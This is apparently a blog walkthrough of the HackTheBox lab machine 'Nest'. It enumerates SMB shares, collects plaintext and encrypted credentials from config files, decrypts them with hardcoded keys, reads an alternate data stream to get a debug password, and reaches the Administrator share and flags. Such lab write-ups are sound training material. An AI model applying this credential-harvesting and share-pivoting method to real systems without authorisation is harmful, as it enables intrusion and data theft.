Hackthebox – Nest

As with all targets, Nest is no exception to starting with several port scans. Below the output of the full port scan.

# root@kalivm:~/Nest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 10:09 CET
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://
nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=3/6%Time=5E621430%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\x
SF:20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20the
SF:\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---\
SF:r\n\r\nLIST\r\nSETDIR\x20\r\nRUNQUERY\x20\r\n
SF:DEBUG\x20\r\nHELP\x20\r\n>")%r(SSLSessionReq,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCookie
SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionRe
SF:q,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20c
SF:ommand\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Re
SF:porting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 392.76 seconds

So only port 445 and 4386 are open. The output is a bit scrambled so I decide to open port 4386 first in a web browser.

HQK Reporting service

An unrecognized command and a session timeout, that did not help me much either. Therefore, the next vector is of course the SMB Server on port 445. First time to see if I can list all shares

root@kalivm:~/Nest# smbclient -L \\10.10.10.178 -N 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

So there are several shares which are listed and can potentially be opened. Time to continue the investigation on the Data directory.

root@kalivm:~/Nest# smbclient \\\\10.10.10.178\\Data -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  .                                   D        0  Wed Aug  7 21:07:51 2019
  ..                                  D        0  Wed Aug  7 21:07:51 2019
  Maintenance                         D        0  Wed Aug  7 21:07:32 2019
  Templates                           D        0  Wed Aug  7 21:08:07 2019

\Shared\Maintenance
  .                                   D        0  Wed Aug  7 21:07:32 2019
  ..                                  D        0  Wed Aug  7 21:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 01:01:44 2019

\Shared\Templates
  .                                   D        0  Wed Aug  7 21:08:07 2019
  ..                                  D        0  Wed Aug  7 21:08:07 2019
  HR                                  D        0  Wed Aug  7 21:08:01 2019
  Marketing                           D        0  Wed Aug  7 21:08:06 2019

\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 21:08:01 2019
  ..                                  D        0  Wed Aug  7 21:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 00:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 21:08:06 2019
  ..                                  D        0  Wed Aug  7 21:08:06 2019

A welcome e-mail, that might be interesting. Time to download that and see what its contents are

smb: \> get "Shared\Templates\HR\Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Shared\Templates\HR\Welcome Email.txt (4.8 KiloBytes/sec) (average 4.8 KiloBytes/sec)
smb: \> ^C
root@kalivm:~/smbdata# ls
 smbdata   smbdatalsl  'Welcome Email.txt'
root@kalivm:~/smbdata# cat Welcome\ Email.txt 
We would like to extend a warm welcome to our newest member of staff,  

You will find your home folder in the following location: 
\\HTB-NEST\Users\

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you

So now we have a username and password. This might allow for more enumeration of the shares, so time to try it.

root@kalivm:~/Nest# smbclient -U TempUser \\\\10.10.10.178\\Data                                                                   
Enter WORKGROUP\TempUser's password:                                                                                               
Try "help" to get a list of possible commands.                                                                                     
smb: \> recurse on                                                                                                                 
smb: \> ls                                                                                                                         
  .                                   D        0  Thu Aug  8 00:53:46 2019                                                         
  ..                                  D        0  Thu Aug  8 00:53:46 2019                                                         
  IT                                  D        0  Thu Aug  8 00:58:07 2019                                                         
  Production                          D        0  Mon Aug  5 23:53:38 2019                                                         
  Reports                             D        0  Mon Aug  5 23:53:44 2019                                                         
  Shared                              D        0  Wed Aug  7 21:07:51 2019                                                         
                                                                                                                                   
\IT                                                                                                                                
  .                                   D        0  Thu Aug  8 00:58:07 2019                                                         
  ..                                  D        0  Thu Aug  8 00:58:07 2019                                                         
  Archive                             D        0  Tue Aug  6 00:33:58 2019                                                         
  Configs                             D        0  Thu Aug  8 00:59:34 2019                                                         
  Installs                            D        0  Thu Aug  8 00:08:30 2019                                                         
  Reports                             D        0  Sun Jan 26 01:09:13 2020                                                         
  Tools                               D        0  Tue Aug  6 00:33:43 2019
---snip---
\IT\Configs                                                                                                                        
  .                                   D        0  Thu Aug  8 00:59:34 2019                                                         
  ..                                  D        0  Thu Aug  8 00:59:34 2019                                                         
  Adobe                               D        0  Wed Aug  7 21:20:09 2019                                                         
  Atlas                               D        0  Tue Aug  6 13:16:18 2019                                                         
  DLink                               D        0  Tue Aug  6 15:25:27 2019                                                         
  Microsoft                           D        0  Wed Aug  7 21:23:26 2019                                                         
  NotepadPlusPlus                     D        0  Wed Aug  7 21:31:37 2019                                                         
  RU Scanner                          D        0  Wed Aug  7 22:01:13 2019                                                         
  Server Manager                      D        0  Tue Aug  6 15:25:19 2019
---snip---
\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 21:31:37 2019
  ..                                  D        0  Wed Aug  7 21:31:37 2019
  config.xml                          A     6451  Thu Aug  8 01:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 21:30:27 2019

\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 22:01:13 2019
  ..                                  D        0  Wed Aug  7 22:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 21:49:37 2019

Now this is where I spent quite some time looking through all the files. As I now got access to the IT share too, I was able to browse all the config files. The two worth mentioning were the RU Scanner and NotepadPlusPlus configuration files.

root@kalivm:~/Nest# cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389
  <Username>c.smith
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
</ConfigFile>root@kalivm:~/Nest# echo -n fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= | base64 -d
}13=XJBAX*Wcf?βc

So I’ve found a username and password combination. But although this looked like a normal, valid Base64 string, it was not. The password got rejected. I have to continue the search and after a while, I find the config file for NotepadPlusPlus which contains some of the history of opened files which is rather interesting.

root@kalivm:~/Nest# cat config.xml
---snip---
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
---snip---

So on the Secure$ Share, in the IT\Carl directory a file was opened. Time to see if I can access the same.

root@kalivm:~/Nest# smbclient -U TempUser \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> ls IT\
NT_STATUS_ACCESS_DENIED listing \IT\

Apparently, I am unable to list files in the IT directory. Trying to simply access the directory is a next step.

smb: \> cd IT\Carl
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 21:42:14 2019
  ..                                  D        0  Wed Aug  7 21:42:14 2019
  Docs                                D        0  Wed Aug  7 21:44:00 2019
  Reports                             D        0  Tue Aug  6 15:45:40 2019
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

                10485247 blocks of size 4096. 6543698 blocks available
smb: \IT\Carl\> 

After just simply browsing to the IT\Carl directory, it appears that I am allowed to list directories in there and it shows several subdirectories. After some more browsing through the various directories, especially the ‘VB Projects’ directory, containing the RU_Scanner project for which I encountered a config file before appeared interesting. After downloading the project as a whole, I started to analyze the project, first looking at the Module1.vb file.

root@kalivm:~/RUScanner# cat Module1.vb 
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
    End Sub

End Module

Apparently this code is built to open the RU_Config file that I found earlier, and then decrypt the password string. This might be interesting so let’s take a look at the Utils.vb file.

root@kalivm:~/RUScanner# cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function
---snip---

So this contained a decryption function which decodes the RU_Config.xml file’s password hash apparently. Time to put this code in dotnetfiddle and see what it comes up with.
Dotnetfiddle password for user Carl
As can be seen, this decodes the string into the value ‘xRxRxPANCAK3SxRxRx’ which might be the password. Time to see if I can get Carl’s home directory to sync using a recursive smbget.

root@kalivm:~/Nest# smbget -rR smb://10.10.10.178/Users/c.smith -U c.smith
Password for [c.smith] connecting to //Users/10.10.10.178:
Using workgroup WORKGROUP, user c.smith
smb://10.10.10.178/Users/c.smith/HQK Reporting/AD Integration Module/HqkLdap.exe
smb://10.10.10.178/Users/c.smith/HQK Reporting/Debug Mode Password.txt
smb://10.10.10.178/Users/c.smith/HQK Reporting/HQK_Config_Backup.xml
smb://10.10.10.178/Users/c.smith/user.txt
Downloaded 17.27kB in 3 seconds
root@kalivm:~/Nest# ls c.smith
'HQK Reporting'   user.txt
root@kalivm:~/Nest# cat user.txt
cf71b25<NOFLAG>4fd827e05f426e987

So that worked and I have found the user flag. Now on to the root flag!

Privilege Escalation

Now with the previous ‘ls’ command, I thought it made me curious why the Debug Mode Password.txt file did not show up. So I went back to the SMB share to investigate.

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 AM 2019 CEST
access_time:    Fri Aug  9 01:06:12 AM 2019 CEST
write_time:     Fri Aug  9 01:08:17 AM 2019 CEST
change_time:    Fri Aug  9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> 

So this info shows actually that there is an alternate data stream in the password file. Not sure what it’s useful for yet, but it might be interesting to find out what is in the alternate stream.

smb: \C.Smith\HQK Reporting\> get DEBUGM~1.txt:password
getting file \C.Smith\HQK Reporting\DEBUGM~1.txt:password of size 15 as DEBUGM~1.txt:password (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> ^C
root@kalivm:~/Nest# cat DEBUGM~1.txt:password 
WBQ201953D8w

As I had not yet further investigated the high-port service yet, I decided to access it using netcat, but that did not give back any feedback apart from the first banner. Therefore, I tried to access it with ‘good ol’ telnet

root@kalivm:~/Nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

So this seemed to work, and there is a debug command that requires a password. This is where the previously found password may come in useful!

 >debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

In debugmode, apparently the Service, Session and ShowQuery commands are added as options to be executed. Time to further analyze the behavior of all these functions.

>setdir ..

Current directory set to HQK 

>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

So apparently, it is possible to change directories through the file system, since I came from the All Queries directory, I first try to look into the LDAP directory.

>setdir ldap

Current directory set to ldap
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: ldap
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Here I see again the same HqkLdap.exe file which I have seen before as a project, and an administrator’s password hash that looks similar to the one from Carl I decoded previously. Time to check out the HqkLdap.exe file to see what it actually does.
illspy showing the reverse engineered code for HQKLdap.exe
After opening the HqkLdap.exe file using IlSpy, I notice a CR Class containing the DS function which seems to require an encrypted string. It might be worth trying this in dotnetfiddle again, but with the admin hash I just found.
dotnetfiddle with the code from HQKLdap and the decrypted value
So using dotnetfiddle, I slightly modified the code to provide the decrypted value as output. Now it is time to see if I can connect to the Users share with this password (XtH4nkS4Pl4y1nGX) and access the Administrators directory.

root@kalivm:~/Nest# smbclient -U Administrator \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator\
smb: \Administrator\> ls
  .                                   D        0  Fri Aug  9 17:08:23 2019
  ..                                  D        0  Fri Aug  9 17:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 17:10:15 2019

                10485247 blocks of size 4096. 6543627 blocks available
smb: \Administrator\> get "flag.txt - Shortcut.lnk"
getting file \Administrator\flag.txt - Shortcut.lnk of size 2384 as flag.txt - Shortcut.lnk (30.6 KiloBytes/sec) (average 30.6 KiloBytes/sec)
smb: \Administrator\> ^C
root@kalivm:~/Nest# cat flag.txt\ -\ Shortcut.lnk 
L       (
N       (
NeK c>"\\HTB-NEST\C$Users\Administrator\Desktop\flag.txt-..\..\c$\Users\Administrator\Desktop\flag.txt)\\Htb-nest\c$\Users\Administrator\Desktop`Xhtb-nestG74Ȫ5
0
 )
 G74Ȫ5
0
 )
        SPS0%G`%
        flag.txt-Text Document@@
N
  K1SPSLXZJ ZDɬe*\\Htb-nest\c$\Users\Administrator\Desktop1SPSjc(=Oy3\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt
,!PCsg<;A1SPS0%G`%                                                                                                     X
        HTB-NEST-1SPS:޳7CD)-1SPSsC
COi܆3n

      5\\Htb-nest\c$Microsoft NetworkDefault sharetOuUsersOu*6Users@shell32.dll,-21813`1O=ADMINI~1OmO=*6Administratorz1 OVbDesktopOm       OVb*6:Desktop@shell32.dll,-21769V2 On flag.txOO:*wflag.txt\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt

That directory however, did only contain a shortcut to the actual flag, which was stored on C:\Users\Administrator\Desktop. Now since I have the administrator’s credentials, I might as well access the C$ Admin share and go through there.

root@kalivm:~/Nest# smbclient -U Administrator \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Tue Jul 14 04:34:39 2009
  Boot                              DHS        0  Sat Jan 25 22:15:35 2020
  bootmgr                          AHSR   383786  Sat Nov 20 05:40:08 2010
  BOOTSECT.BAK                     AHSR     8192  Tue Aug  6 07:16:26 2019
  Config.Msi                        DHS        0  Sat Jan 25 22:49:12 2020
  Documents and Settings            DHS        0  Tue Jul 14 07:06:44 2009
  pagefile.sys                      AHS 2146881536  Fri Mar  6 08:43:46 2020
  PerfLogs                            D        0  Tue Jul 14 05:20:08 2009
  Program Files                      DR        0  Thu Aug  8 01:40:50 2019
  Program Files (x86)                DR        0  Tue Jul 14 07:06:53 2009
  ProgramData                        DH        0  Mon Aug  5 22:24:41 2019
  Recovery                          DHS        0  Mon Aug  5 22:22:25 2019
  restartsvc.bat                      A       33  Thu Aug  8 01:43:09 2019
  Shares                              D        0  Tue Aug  6 15:59:55 2019
  System Volume Information         DHS        0  Tue Aug  6 06:17:38 2019
  Users                              DR        0  Thu Aug  8 19:19:40 2019
  Windows                             D        0  Fri Mar  6 09:37:08 2020

                10485247 blocks of size 4096. 6543627 blocks available

Bingo! All I have to do now, is got the the admin desktop and get the flag!

smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

                10485247 blocks of size 4096. 6543627 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> ^C
root@kalivm:~/Nest# cat root.txt 
6594c2e<NOFLAG>08a42f0b94b878c41

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.